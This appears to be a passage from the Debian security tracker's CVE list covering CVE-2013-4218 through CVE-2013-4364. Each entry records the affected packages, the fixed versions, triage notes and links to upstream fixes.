libapache2-mod-fcgid 1:2.3.9-1 (bug #725942) CVE-2013-4364 ((1) oo-analytics-export and (2) oo-analytics-import in the openshift-o ...) NOT-FOR-US: OpenShift CVE-2013-4363 (Algorithmic complexity vulnerability in Gem::Version::ANCHORED_VERSION ...) - rubygems 3.2.0~rc.1-1 (unimportant; bug #722361) - libgems-ruby (unimportant; bug #722361) NOTE: Non-issue, you trust the site providing the gem with installing arbitrary code, allowing NOTE: it a potential elevated CPU consumption doesn't add any extra harm NOTE: CVE for incomplete fix for CVE-2013-4287 CVE-2013-4362 (WEB-DAV Linux File System (davfs2) 1.4.6 and 1.4.7 allow local users t ...) {DSA-2765-1} - davfs2 1.4.7-3 (bug #723034) NOTE: http://savannah.nongnu.org/bugs/?40034 CVE-2013-4361 (The fbld instruction emulation in Xen 3.3.x through 4.3.x does not use ...) {DSA-3006-1} - xen 4.4.0-1 [squeeze] - xen (Unsupported in squeeze-lts) CVE-2013-4360 REJECTED CVE-2013-4359 (Integer overflow in kbdint.c in mod_sftp in ProFTPD 1.3.4d and 1.3.5r3 ...) {DSA-2767-1} - proftpd-dfsg 1.3.5~rc3-2.1 (bug #723179) CVE-2013-4358 (libavcodec/h264.c in FFmpeg before 0.11.4 allows remote attackers to c ...) - libav 6:9.1-1 [wheezy] - libav (Vulnerable code not present) - ffmpeg (Vulnerable code not present) NOTE: libav fix: http://git.libav.org/?p=libav.git;a=commit;h=072be3e8969f24113d599444be4d6a0ed04a6602 CVE-2013-4357 (The eglibc package before 2.14 incorrectly handled the getaddrinfo() f ...) {DLA-165-1} - eglibc 2.17-1 (unimportant; bug #742925) [wheezy] - eglibc 2.13-38+deb7u6 NOTE: http://sourceware.org/bugzilla/show_bug.cgi?id=12671 NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=797096 NOTE: https://sourceware.org/git/?p=glibc.git;a=commit;h=f2962a71959fd254a7a223437ca4b63b9e81130c NOTE: https://sourceware.org/git/?p=glibc.git;a=commit;h=34a9094f49241ebb72084c536cf468fd51ebe3ec NOTE: https://sourceware.org/git/?p=glibc.git;a=commit;h=c8fc0c91695b1c7003c7170861274161f9224817 NOTE: Fixed upstream in 2.14 CVE-2013-4356 (Xen 4.3.x writes hypervisor mappings to certain shadow pagetables when ...) - xen 4.4.0-1 [wheezy] - xen (Only affects 4.3+) [squeeze] - xen (Only affects 4.3+) CVE-2013-4355 (Xen 4.3.x and earlier does not properly handle certain errors, which a ...) {DSA-3006-1} - xen 4.4.0-1 [squeeze] - xen (Unsupported in squeeze-lts) CVE-2013-4354 (The API before 2.1 in OpenStack Image Registry and Delivery Service (G ...) - glance (unimportant) NOTE: https://bugs.launchpad.net/glance/+bug/1226078 NOTE: according to upstream bug there will probably not be a patch for this issue CVE-2013-4353 (The ssl3_take_mac function in ssl/s3_both.c in OpenSSL 1.0.1 before 1. ...) {DSA-2837-1} - openssl 1.0.1f-1 [squeeze] - openssl (Only affects 1.0.1 to 1.0.1e) CVE-2013-4352 (The cache_invalidate function in modules/cache/cache_storage.c in the ...) - apache2 2.4.7-1 (low) [wheezy] - apache2 (Only affects 2.4.[56]) [squeeze] - apache2 (Only affects 2.4.[56]) CVE-2013-4351 (GnuPG 1.4.x, 2.0.x, and 2.1.x treats a key flags subpacket with all bi ...) {DSA-2774-1 DSA-2773-1} - gnupg 1.4.15-1 (low; bug #722722) - gnupg2 2.0.22-1 (low; bug #722724) CVE-2013-4350 (The IPv6 SCTP implementation in net/sctp/ipv6.c in the Linux kernel th ...) - linux-2.6 (Vulnerable code not present) - linux 3.11.5-1 [wheezy] - linux 3.2.53-1 NOTE: https://www.openwall.com/lists/oss-security/2013/09/13/2 NOTE: http://git.kernel.org/cgit/linux/kernel/git/davem/net.git/commit/?id=95ee62083cb6453e056562d91f597552021e6ae7 CVE-2013-4349 REJECTED CVE-2013-4348 (The skb_flow_dissect function in net/core/flow_dissector.c in the Linu ...) - linux 3.11.6-2 - linux-2.6 (Introduced in 3.2) [wheezy] - linux 3.2.53-2 CVE-2013-4347 (The (1) make_nonce, (2) generate_nonce, and (3) generate_verifier func ...) - python-oauth2 (low; bug #722657) [wheezy] - python-oauth2 (Minor issue) NOTE: https://www.openwall.com/lists/oss-security/2013/09/12/5 NOTE: https://github.com/simplegeo/python-oauth2/issues/9 CVE-2013-4346 (The Server.verify_request function in SimpleGeo python-oauth2 does not ...) - python-oauth2 (low; bug #722656) [wheezy] - python-oauth2 (Minor issue) NOTE: https://www.openwall.com/lists/oss-security/2013/09/12/5 NOTE: https://github.com/simplegeo/python-oauth2/issues/129 CVE-2013-4345 (Off-by-one error in the get_prng_bytes function in crypto/ansi_cprng.c ...) {DSA-2906-1} - linux-2.6 - linux 3.11.5-1 [wheezy] - linux 3.2.53-1 CVE-2013-4344 (Buffer overflow in the SCSI implementation in QEMU, as used in Xen, wh ...) {DSA-2933-1 DSA-2932-1} - xen 4.2-1 [wheezy] - xen (Vulnerable code not present in the bundled 0.10 qemu) [squeeze] - xen (Unsupported in squeeze-lts) - qemu 1.6.0+dfsg-2 (unimportant; bug #725944) - qemu-kvm (unimportant) - xen-qemu-dm-4.0 [squeeze] - xen-qemu-dm-4.0 (Unsupported in squeeze-lts) NOTE: Qemu only exploitable by privileged administrator with malicious configuration NOTE: Xen in Squeeze uses a separate source package: xen-qemu-dm-4.0 NOTE: Xen in Wheezy includes qemu NOTE: Xen after Wheezy uses qemu-system-x86 from qemu, marking 4.2 as pseudo fixed CVE-2013-4343 (Use-after-free vulnerability in drivers/net/tun.c in the Linux kernel ...) - linux 3.11.5-1 [wheezy] - linux (Introduced in 3.8) - linux-2.6 (Introduced in 3.8) CVE-2013-4342 (xinetd does not enforce the user and group configuration directives fo ...) - xinetd 1:2.3.15-2 (bug #324678) [wheezy] - xinetd 1:2.3.14-7.1+deb7u1 [squeeze] - xinetd (Minor issue) CVE-2013-4341 (Multiple cross-site scripting (XSS) vulnerabilities in Moodle through ...) - moodle 2.5.2-1 [squeeze] - moodle (Unsupported in squeeze-lts) CVE-2013-4340 (wp-admin/includes/post.php in WordPress before 3.6.1 allows remote aut ...) {DSA-2757-1} - wordpress 3.6.1+dfsg-1 (bug #722537) NOTE: http://core.trac.wordpress.org/changeset/25321 CVE-2013-4339 (WordPress before 3.6.1 does not properly validate URLs before use in a ...) {DSA-2757-1} - wordpress 3.6.1+dfsg-1 (bug #722537) NOTE: http://core.trac.wordpress.org/changeset/25323 NOTE: http://core.trac.wordpress.org/changeset/25324 CVE-2013-4338 (wp-includes/functions.php in WordPress before 3.6.1 does not properly ...) {DSA-2757-1} - wordpress 3.6.1+dfsg-1 (bug #722537) NOTE: http://core.trac.wordpress.org/changeset/25325 CVE-2013-4337 REJECTED CVE-2013-4336 REJECTED CVE-2013-4335 (opOpenSocialPlugin 0.8.2.1, > 0.9.9.2, 0.9.13, 1.2.6: Multiple XML ...) NOT-FOR-US: opOpenSocialPlugin CVE-2013-4334 (opWebAPIPlugin 0.5.1, 0.4.0, and 0.1.0: XXE Vulnerabilities ...) NOT-FOR-US: opWebAPIPlugin CVE-2013-4333 (OpenPNE 3 versions 3.8.7, 3.6.11, 3.4.21.1, 3.2.7.6, 3.0.8.5 has an Ex ...) NOT-FOR-US: OpenPNE CVE-2013-4332 (Multiple integer overflows in malloc/malloc.c in the GNU C Library (ak ...) {DLA-165-1} - glibc 2.17-93 (bug #722536) - eglibc [wheezy] - eglibc 2.13-38+deb7u1 CVE-2013-4331 (Light Display Manager (aka LightDM) 1.4.x before 1.4.3, 1.6.x before 1 ...) - lightdm 1.6.2-1 (bug #721744) [wheezy] - lightdm (Introduced in 1.4) CVE-2013-4330 (Apache Camel before 2.9.7, 2.10.0 before 2.10.7, 2.11.0 before 2.11.2, ...) NOT-FOR-US: Apache Camel CVE-2013-4329 (The xenlight library (libxl) in Xen 4.0.x through 4.2.x, when IOMMU is ...) {DSA-3006-1} - xen 4.3.0-1 [squeeze] - xen (libxl not packaged in squeeze) NOTE: http://lists.xen.org/archives/html/xen-announce/2013-09/msg00001.html CVE-2013-4328 REJECTED CVE-2013-4327 (systemd does not properly use D-Bus for communication with a polkit au ...) {DSA-2777-1} - systemd 204-5 (bug #723713) CVE-2013-4326 (RealtimeKit (aka rtkit) 0.5 does not properly use D-Bus for communicat ...) - rtkit 0.10-3 (bug #723714) [wheezy] - rtkit 0.10-2+wheezy1 CVE-2013-4325 (The check_permission_v1 function in base/pkit.py in HP Linux Imaging a ...) {DSA-2829-1} - hplip 3.13.9-1 (bug #723716) CVE-2013-4324 (spice-gtk 0.14, and possibly other versions, invokes the polkit author ...) - spice-gtk 0.21-0nocelt1 (low) [wheezy] - spice-gtk (Minor issue) CVE-2013-4323 RESERVED CVE-2013-4322 (Apache Tomcat before 6.0.39, 7.x before 7.0.50, and 8.x before 8.0.0-R ...) {DSA-3530-1 DSA-2897-1 DLA-91-1} - tomcat6 6.0.39 - tomcat7 7.0.50 - tomcat8 8.0.0 CVE-2013-4321 (The File Abstraction Layer (FAL) in TYPO3 6.0.x before 6.0.8 and 6.1.x ...) - typo3-src (All versions from 6.0.0 up to the development branch of 6.2) CVE-2013-4320 (The File Abstraction Layer (FAL) in TYPO3 6.0.x before 6.0.9 and 6.1.x ...) - typo3-src (All versions from 6.0.0 up to the development branch of 6.2) CVE-2013-4319 (pbs_mom in Terascale Open-Source Resource and Queue Manager (aka TORQU ...) {DSA-2770-1} - torque 2.4.16+dfsg-1.1 (bug #722306) NOTE: http://www.supercluster.org/pipermail/torqueusers/2013-September/016098.html CVE-2013-4318 (File injection vulnerability in Ruby gem Features 0.3.0 allows remote ...) NOT-FOR-US: Ruby gem Features NOTE: https://www.openwall.com/lists/oss-security/2013/09/09/9 CVE-2013-4317 (In Apache CloudStack 4.1.0 and 4.1.1, when calling the CloudStack API ...) NOT-FOR-US: CloudStack CVE-2013-4316 (Apache Struts 2.0.0 through 2.3.15.1 enables Dynamic Method Invocation ...) - libstruts1.2-java (Affects Struts 2.0.0 - Struts 2.3.15.1) NOTE: http://struts.apache.org/release/2.3.x/docs/s2-019.html CVE-2013-4315 (Directory traversal vulnerability in Django 1.4.x before 1.4.7, 1.5.x ...) {DSA-2755-1} - python-django 1.5.3-1 (bug #722605) CVE-2013-4314 (The X509Extension in pyOpenSSL before 0.13.1 does not properly handle ...) {DSA-2763-1} - pyopenssl 0.13-2.1 (bug #722055) CVE-2013-4313 (Moodle through 2.2.11, 2.3.x before 2.3.9, 2.4.x before 2.4.6, and 2.5 ...) - moodle 2.5.2-1 [squeeze] - moodle CVE-2013-4312 (The Linux kernel before 4.4.1 allows local users to bypass file-descri ...) {DSA-3503-1 DSA-3448-1} - linux 4.3.3-6 - linux-2.6 NOTE: https://git.kernel.org/linus/712f4aad406bb1ed67f3f98d04c044191f0ff593 (v4.5-rc1) NOTE: First patch for mitigation in 4.3.3-6, 4.3.5-1 adds a second bit required, that is CVE-2016-2847 CVE-2013-4311 (libvirt 1.0.5.x before 1.0.5.6, 0.10.2.x before 0.10.2.8, and 0.9.12.x ...) - libvirt 1.1.3~rc1-1 (unimportant) NOTE: polkit support not activated in Debian build prior to 1.2.9. NOTE: sourcewise support for 3-arg pkcheck syntax in libvirt is included NOTE: since 0.9.12.3-1 in wheezy-security (and 1.1.3~rc1-1 in unstable). But we need NOTE: to wait for the pu in #726558 for policykit-1/0.105-3+deb7u1 and have a rebuild NOTE: of libvirt then. NOTE: Needs a build dependency on libpolkit-gobject-1-dev CVE-2013-4310 (Apache Struts 2.0.0 through 2.3.15.1 allows remote attackers to bypass ...) - libstruts1.2-java (Affects Struts 2.0.0 - Struts 2.3.15.1) NOTE: http://struts.apache.org/release/2.3.x/docs/s2-018.html CVE-2013-4309 RESERVED CVE-2013-4308 (Cross-site scripting (XSS) vulnerability in pages/TalkpageHistoryView. ...) NOT-FOR-US: Mediawiki LiquidThreads extension CVE-2013-4307 (Multiple cross-site scripting (XSS) vulnerabilities in repo/includes/E ...) NOT-FOR-US: Mediawiki Wikibase CVE-2013-4306 (Cross-site request forgery (CSRF) vulnerability in api/ApiQueryCheckUs ...) NOT-FOR-US: Mediawiki CheckUser extension CVE-2013-4305 (Cross-site scripting (XSS) vulnerability in contrib/example.php in the ...) - mediawiki-extensions (unimportant) NOTE: https://bugzilla.wikimedia.org/show_bug.cgi?id=49070 NOTE: Just an example file CVE-2013-4304 (The CentralAuth extension for MediaWiki 1.19.x before 1.19.8, 1.20.x b ...) NOT-FOR-US: Mediawiki CentralAuth extension CVE-2013-4303 (includes/libs/IEUrlExtension.php in the MediaWiki API in MediaWiki 1.1 ...) - mediawiki 1:1.19.8+dfsg-1 (unimportant) [squeeze] - mediawiki NOTE: https://bugzilla.wikimedia.org/show_bug.cgi?id=52746 NOTE: IE6 lacks so many security features that this doesn't matter CVE-2013-4302 ((1) ApiBlock.php, (2) ApiCreateAccount.php, (3) ApiLogin.php, (4) ApiM ...) {DSA-2753-1} - mediawiki 1:1.19.8+dfsg-1 [squeeze] - mediawiki NOTE: https://bugzilla.wikimedia.org/show_bug.cgi?id=49090 CVE-2013-4301 (includes/resourceloader/ResourceLoaderContext.php in MediaWiki 1.19.x ...) - mediawiki 1:1.19.8+dfsg-1 (unimportant) [squeeze] - mediawiki NOTE: Full path disclosure irrelevant in Debian NOTE: https://bugzilla.wikimedia.org/show_bug.cgi?id=46332 CVE-2013-4300 (The scm_check_creds function in net/core/scm.c in the Linux kernel bef ...) - linux 3.11.5-1 [wheezy] - linux (Not exploitable by unprivileged users in 3.2) - linux-2.6 (Not exploitable by unprivileged users in 2.6.32) CVE-2013-4299 (Interpretation conflict in drivers/md/dm-snap-persistent.c in the Linu ...) {DSA-2906-1} - linux-2.6 - linux 3.11.6-2 [wheezy] - linux 3.2.53-1 NOTE: upstream commit: http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=e9c6a182649f4259db704ae15a91ac820e63b0ca CVE-2013-4297 (The virFileNBDDeviceAssociate function in util/virfile.c in libvirt 1. ...) - libvirt 1.1.2-2 [jessie] - libvirt (Introduced with 8aabd597b379db5ae1655e36dff4f10d5622830a) [wheezy] - libvirt (Introduced with 8aabd597b379db5ae1655e36dff4f10d5622830a) [squeeze] - libvirt (Introduced with 8aabd597b379db5ae1655e36dff4f10d5622830a) NOTE: http://libvirt.org/git/?p=libvirt.git;a=commitdiff;h=2dba0323ff0cec31bdcea9dd3b2428af297401f2 NOTE: Introduced with 8aabd597b379db5ae1655e36dff4f10d5622830a, 1.0.6 CVE-2013-4296 (The remoteDispatchDomainMemoryStats function in daemon/remote.c in lib ...) {DSA-2764-1} - libvirt 1.1.4-1 [squeeze] - libvirt (Vulnerable code not present, introduced by commit 158ba8730e44b7dd07a21ab90499996c5dec080a) NOTE: http://libvirt.org/git/?p=libvirt.git;a=commit;h=158ba8730e44b7dd07a21ab90499996c5dec080a NOTE: Fix: http://libvirt.org/git/?p=libvirt.git;a=commitdiff;h=e7f400a110e2e3673b96518170bfea0855dd82c0 CVE-2013-4295 (The gadget renderer in Apache Shindig 2.5.0 for PHP allows remote atta ...) NOT-FOR-US: Apache Shindig CVE-2013-4294 (The (1) mamcache and (2) KVS token backends in OpenStack Identity (Key ...) - keystone 2013.1.3-2 (bug #722505) [wheezy] - keystone (only affects Folsom release and above) CVE-2013-4293 (The server in Red Hat JBoss Operations Network (JON) 3.1.2 logs passwo ...) NOT-FOR-US: Red Hat JBoss Operations Network CVE-2013-4292 (libvirt 1.1.0 and 1.1.1 allows local users to cause a denial of servic ...) - libvirt 1.1.2~rc2-1 (bug #721325) [jessie] - libvirt (Introduced with 1.1.0) [wheezy] - libvirt (Introduced with 1.1.0) [squeeze] - libvirt (Introduced with 1.1.0) CVE-2013-4291 (The virSecurityManagerSetProcessLabel function in libvirt 0.10.2.7, 1. ...) - libvirt 1.1.2-2 [jessie] - libvirt (vulnerable code not introduced, introduced in 1.1.1) [wheezy] - libvirt (vulnerable code not introduced, introduced in 1.1.1) [squeeze] - libvirt (vulnerable code not introduced, introduced in 1.1.1) NOTE: http://libvirt.org/git/?p=libvirt.git;a=commit;h=745aa55fbf3e076c4288d5ec3239f5a5d43508a6 CVE-2013-4290 (Stack-based buffer overflow in OpenJPEG before 1.5.2 allows remote att ...) - openjpeg (unimportant; bug #722540) NOTE: JP3D code not built in the binary package, see #722540 CVE-2013-4289 (Multiple integer overflows in lib/openjp3d/jp3d.c in OpenJPEG before 1 ...) - openjpeg (unimportant; bug #722540) NOTE: JP3D code not built in the binary package, see #722540 CVE-2013-4288 (Race condition in PolicyKit (aka polkit) allows local users to bypass ...) - policykit-1 0.105-3+nmu1 (low; bug #723717) [squeeze] - policykit-1 (The update only deprecates an API and introduces a new option for pkcheck, no src package uses this API) [wheezy] - policykit-1 (The update only deprecates an API and introduces a new option for pkcheck, no src package uses this API) CVE-2013-4287 (Algorithmic complexity vulnerability in Gem::Version::VERSION_PATTERN ...) - rubygems 3.2.0~rc.1-1 (unimportant; bug #722361) - libgems-ruby (unimportant; bug #722361) NOTE: Non-issue, you trust the site providing the gem with installing arbitrary code, allowing NOTE: it a potential elevated CPU consumption doesn't add any extra harm CVE-2013-4286 (Apache Tomcat before 6.0.39, 7.x before 7.0.47, and 8.x before 8.0.0-R ...) {DSA-3530-1 DSA-2897-1 DLA-91-1} - tomcat6 6.0.39 - tomcat7 7.0.47 - tomcat8 8.0.0 CVE-2013-4285 (A certain Gentoo patch for the PAM S/Key module does not properly clea ...) NOT-FOR-US: pam_skey CVE-2013-4284 (Cumin, as used in Red Hat Enterprise MRG 2.4, allows remote attackers ...) NOT-FOR-US: Cumin CVE-2013-4283 (ns-slapd in 389 Directory Server before 1.3.0.8 allows remote attacker ...) - 389-ds-base 1.3.2.9-1 (bug #721222) NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=999634 CVE-2013-4282 (Stack-based buffer overflow in the reds_handle_ticket function in serv ...) {DSA-2839-1} - spice 0.12.4-0nocelt2 (bug #728314) NOTE: http://cgit.freedesktop.org/spice/spice/commit/?id=8af619009660b24e0b41ad26b30289eea288fcc2 CVE-2013-4281 RESERVED CVE-2013-4280 (Insecure temporary file vulnerability in RedHat vsdm 4.9.6. ...) - vdsm (bug #668538) CVE-2013-4279 (imapsync 1.564 and earlier performs a release check by default, which ...) - imapsync CVE-2013-4278 (The "create an instance" API in OpenStack Compute (Nova) Folsom, Grizz ...) - nova 2013.1.3-1 (bug #720602) [wheezy] - nova (Affected code not present) NOTE: incomplete fix for CVE-2013-2256 CVE-2013-4277 (Svnserve in Apache Subversion 1.4.0 through 1.7.12 and 1.8.0 through 1 ...) - subversion 1.7.13-1 (low; bug #721542) [squeeze] - subversion (Minor issue, PID file not created by default) [wheezy] - subversion (Minor issue, PID file not created by default) NOTE: http://subversion.apache.org/security/CVE-2013-4277-advisory.txt CVE-2013-4276 (Multiple stack-based buffer overflows in LittleCMS (aka lcms or liblcm ...) - lcms 1.19.dfsg1-1.3 (low; bug #718682) [squeeze] - lcms (Minor issue) [wheezy] - lcms 1.19.dfsg2-1.2+deb7u1 - lcms2 (Vulnerable code not present) CVE-2013-4275 (Cross-site scripting (XSS) vulnerability in the zen_breadcrumb functio ...) NOT-FOR-US: Drupal contributed module Zen CVE-2013-4274 (Cross-site scripting (XSS) vulnerability in the password_policy_admin_ ...) NOT-FOR-US: Drupal addon CVE-2013-4273 (The Entity API module 7.x-1.x before 7.x-1.2 for Drupal does not prope ...) NOT-FOR-US: Drupal contributed module Entity API CVE-2013-4272 (The BOTCHA Spam Prevention module 7.x-1.x before 7.x-1.6, 7.x-2.x befo ...) NOT-FOR-US: Drupal addon CVE-2013-4271 (The default configuration of the ObjectRepresentation class in Restlet ...) - restlet (bug #596472) CVE-2013-4270 (The net_ctl_permissions function in net/sysctl_net.c in the Linux kern ...) - linux-2.6 (Introduced in 3.8) - linux 3.11.5-1 [wheezy] - linux (Introduced in 3.8) NOTE: Introduced with http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=cff109768b2d9c03095848f4cd4b0754117262aa NOTE: Fixed by http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=2433c8f094a008895e66f25bd1773cdb01c91d01 CVE-2013-4269 REJECTED CVE-2013-4268 REJECTED CVE-2013-4267 (Ajaxeplorer before 5.0.1 allows remote attackers to execute arbitrary ...) - ajaxplorer (bug #668381) CVE-2013-4266 REJECTED CVE-2013-4265 (The av_reallocp_array function in libavutil/mem.c in FFmpeg before 2.0 ...) - ffmpeg (Affected function codec not present in 0.5 ffmpeg) - libav (Affected function not present in libav) NOTE: https://github.com/FFmpeg/FFmpeg/commit/c94f9e854228e0ea00e1de8769d8d3f7cab84a55 CVE-2013-4264 (The kempf_decode_tile function in libavcodec/g2meet.c in FFmpeg before ...) - ffmpeg (g2meet codec not present in 0.5 ffmpeg) - libav (g2meet codec not present in libav) NOTE: https://github.com/FFmpeg/FFmpeg/commit/2960576378d17d71cc8dccc926352ce568b5eec1 CVE-2013-4263 (libavfilter in FFmpeg before 2.0.1 has unspecified impact and remote v ...) - ffmpeg (Affected video filters not present in ffmpeg 0.5) - libav (Vulnerable code not present) NOTE: https://github.com/FFmpeg/FFmpeg/commit/e43a0a232dbf6d3c161823c2e07c52e76227a1bc NOTE: [Anton] the report and the fix appear completely bogus, likely working around bugs from completely different parts of the code; most probably not present in any libav release CVE-2013-4262 (svnwcsub.py in Subversion 1.8.0 before 1.8.3, when using the --pidfile ...) - subversion 1.8.5-1 (unimportant) NOTE: Optional admin-side utilities in Subversion 1.8.x CVE-2013-4261 (OpenStack Compute (Nova) Folsom, Grizzly, and earlier, when using Apac ...) - nova 2013.2-1 (low) [wheezy] - nova (Will be fixed in a point update) NOTE: https://bugs.launchpad.net/nova/+bug/1215091/comments/10 (relevant question for other components) NOTE: probably does not affect Essex/2012.1, see https://bugs.launchpad.net/nova/+bug/1215091/comments/6 CVE-2013-4260 (lib/ansible/playbook/__init__.py in Ansible 1.2.x before 1.2.3, when p ...) - ansible (affected code introduced with ansible 1.2) CVE-2013-4259 (runner/connection_plugins/ssh.py in Ansible before 1.2.3, when using C ...) - ansible 1.3.4+dfsg-1 (bug #721766) NOTE: upstream commit: https://github.com/ansible/ansible/commit/6bf5d195065bc23b5fc72ba690d7ed45f228aaf0 CVE-2013-4258 (Format string vulnerability in the osLogMsg function in server/os/aulo ...) {DSA-2771-1} - nas 1.9.3-6 (bug #720287) CVE-2013-4257 [Heap Overflow] REJECTED CVE-2013-4256 (Multiple stack-based and heap-based buffer overflows in Network Audio ...) {DSA-2771-1} - nas 1.9.3-6 (bug #720287) CVE-2013-4255 (The policy definition evaluator in Condor 7.5.4, 8.0.0, and earlier do ...) - condor 8.0.5~dfsg.1-1 (bug #721693) [wheezy] - condor (Minor issue) CVE-2013-4254 (The validate_event function in arch/arm/kernel/perf_event.c in the Lin ...) - linux 3.10.11-1 [wheezy] - linux 3.2.51-1 - linux-2.6 (No perf support on arm) CVE-2013-4253 RESERVED CVE-2013-4252 RESERVED CVE-2013-4251 (The scipy.weave component in SciPy before 0.12.1 creates insecure temp ...) {DLA-26-1} - python-scipy 0.12.0-3 (bug #726093) [wheezy] - python-scipy (Minor issue) [squeeze] - python-scipy 0.7.2+dfsg1-1+deb6u1 NOTE: https://github.com/scipy/scipy/commit/bd296e0336420b840fcd2faabb97084fd252a973 CVE-2013-4250 (The (1) file upload component and (2) File Abstraction Layer (FAL) in ...) - typo3-src (All versions from 6.0.0 up to the development branch of 6.2) CVE-2013-4249 (Cross-site scripting (XSS) vulnerability in the AdminURLFieldWidget wi ...) - python-django 1.5.2-1 [wheezy] - python-django (1.4.x not affected) [squeeze] - python-django (1.2.x not affected) NOTE: problem introduced with https://github.com/django/django/commit/ac2052ebc84c45709ab5f0f25e685bf656ce79bc CVE-2013-4248 (The openssl_x509_parse function in openssl.c in the OpenSSL module in ...) {DSA-2742-1} - php5 5.5.3+dfsg-1 (bug #719765) NOTE: fix in 5.5.2 incomplete, see http://php.net/ChangeLog-5.php CVE-2013-4247 (Off-by-one error in the build_unc_path_to_root function in fs/cifs/con ...) - linux-2.6 (Introduced in 3.8) - linux 3.9.6-1 [wheezy] - linux (Introduced in 3.8) CVE-2013-4246 (libsvn_fs_fs/fs_fs.c in Apache Subversion 1.8.x before 1.8.2 might all ...) - subversion (only affects 1.8.0 and 1.8.1) CVE-2013-4245 (Orca has arbitrary code execution due to insecure Python module load ...) - gnome-orca (unimportant) NOTE: Negligible security impact CVE-2013-4244 (The LZW decompressor in the gif2tiff tool in libtiff 4.0.3 and earlier ...) {DSA-2744-1} - tiff 4.0.3-3 - tiff3 (The tiff3 source package doesn't build the TIFF tools) CVE-2013-4243 (Heap-based buffer overflow in the readgifimage function in the gif2tif ...) {DSA-2965-1 DLA-0013-1} - tiff 4.0.3-9 (low; bug #742917) - tiff3 (The tiff3 source package doesn't build the TIFF tools) [squeeze] - tiff 3.9.4-5+squeeze11 NOTE: http://bugzilla.maptools.org/show_bug.cgi?id=2451 CVE-2013-4242 (GnuPG before 1.4.14, and Libgcrypt before 1.5.3 as used in GnuPG 2.0.x ...) {DSA-2731-1 DSA-2730-1} - gnupg 1.4.14-1 (bug #717880) - libgcrypt11 1.5.3-1 CVE-2013-4241 (Multiple cross-site scripting (XSS) vulnerabilities in the HMS Testimo ...) NOT-FOR-US: WordPress plugin HMS Testimonials CVE-2013-4240 (Multiple cross-site request forgery (CSRF) vulnerabilities in the HMS ...) NOT-FOR-US: WordPress plugin HMS Testimonials CVE-2013-4239 (The xenDaemonListDefinedDomains function in xen/xend_internal.c in lib ...) - libvirt 1.1.2~rc1-1 (bug #719533) [wheezy] - libvirt (Introduced in 1.1.1) [squeeze] - libvirt (Introduced in 1.1.1) NOTE: Introduced by: http://libvirt.org/git/?p=libvirt.git;a=commit;h=632180d1 NOTE: Fixed by: http://libvirt.org/git/?p=libvirt.git;a=commit;h=0e671a16 CVE-2013-4238 (The ssl.match_hostname function in the SSL module in Python 2.6 throug ...) {DSA-2880-1 DLA-25-1} - python2.5 (low) [squeeze] - python2.5 (Minor issue) - python2.6 (low) [wheezy] - python2.6 (Minor issue) - python2.7 2.7.5-8 (low; bug #719566) - python3.1 (low) [squeeze] - python3.1 (Minor issue) - python3.2 (low; bug #719568) [wheezy] - python3.2 (Minor issue) - python3.3 3.3.2-6 (low; bug #719567) NOTE: http://bugs.python.org/issue18709 NOTE: https://bugs.mageia.org/show_bug.cgi?id=10989 CVE-2013-4237 (sysdeps/posix/readdir_r.c in the GNU C Library (aka glibc or libc6) 2. ...) {DLA-165-1} - eglibc - glibc 2.17-94 (bug #719558) [wheezy] - eglibc 2.13-38+deb7u1 NOTE: http://sourceware.org/bugzilla/show_bug.cgi?id=14699 NOTE: http://sourceware.org/ml/libc-alpha/2013-05/msg00445.html CVE-2013-4236 (VDSM in Red Hat Enterprise Virtualization 3 and 3.2 allows privileged ...) - vdsm (bug #668538) CVE-2013-4235 (shadow: TOCTOU (time-of-check time-of-use) race condition when copying ...) - shadow (unimportant; bug #778950) CVE-2013-4234 (Multiple heap-based buffer overflows in the (1) abc_MIDI_drum and (2) ...) {DSA-2751-1} - libmodplug 1:0.8.8.4-4 (bug #719462) CVE-2013-4233 (Integer overflow in the abc_set_parts function in load_abc.cpp in libm ...) {DSA-2751-1} - libmodplug 1:0.8.8.4-4 (bug #719462) CVE-2013-4232 (Use-after-free vulnerability in the t2p_readwrite_pdf_image function i ...) {DSA-2744-1} - tiff 4.0.3-2 (bug #719303) - tiff3 (The tiff3 source package doesn't build the TIFF tools) CVE-2013-4231 (Multiple buffer overflows in libtiff before 4.0.3 allow remote attacke ...) {DSA-2744-1} - tiff 4.0.3-2 (bug #719303) - tiff3 (The tiff3 source package doesn't build the TIFF tools) CVE-2013-4230 (The mm_webform submodule in the Monster Menus module 6.x-6.x before 6. ...) NOT-FOR-US: Monster Menus Drupal contributed module CVE-2013-4229 (Cross-site scripting (XSS) vulnerability in the Monster Menus module 7 ...) NOT-FOR-US: Monster Menus Drupal contributed module CVE-2013-4228 (The OG access fields (visibility fields) implementation in Organic Gro ...) NOT-FOR-US: Organic Group Drupal contributed module CVE-2013-4227 (Cross-site request forgery (CSRF) vulnerability in the persona_xsrf_to ...) NOT-FOR-US: Persona Drupal contributed module CVE-2013-4226 (The Authenticated User Page Caching (Authcache) module 7.x-1.x before ...) NOT-FOR-US: Authenticated User Page Caching Drupal contributed module CVE-2013-4225 (The RESTful Web Services (restws) module 7.x-1.x before 7.x-1.4 and 7. ...) NOT-FOR-US: RESTful Web Services (RESTWS) Drupal cotributed module CVE-2013-4224 REJECTED CVE-2013-4223 (The Gentoo Nullmailer package before 1.11-r2 uses world-readable permi ...) - nullmailer 1:1.11-2 (low; bug #684619) [squeeze] - nullmailer (Minor issue) NOTE: CVE originally for /etc/nullmailer/remotes permissions in gentoo, but Debian NOTE: had the same problem until 1:1.11-2 CVE-2013-4222 (OpenStack Identity (Keystone) Folsom, Grizzly 2013.1.3 and earlier, an ...) - keystone 2013.1.3-1 (bug #719290) [wheezy] - keystone (Vulnerable code not present in Openstack Essex) NOTE: http://lists.openstack.org/pipermail/openstack-security/2013-August/000263.html CVE-2013-4221 (The default configuration of the ObjectRepresentation class in Restlet ...) - restlet (bug #596472) NOTE: http://blog.diniscruz.com/2013/08/using-xmldecoder-to-execute-server-side.html NOTE: https://github.com/o2platform/DefCon_RESTing CVE-2013-4220 (The bad_mode function in arch/arm64/kernel/traps.c in the Linux kernel ...) - linux-2.6 (ARM64 not supported) - linux (ARM64 not yet supported) CVE-2013-4219 (Multiple integer overflows in the Intel WiMAX Network Service through ...) - wimax-tools (bug #627975) CVE-2013-4218 (The InitMethodAndPassword function in 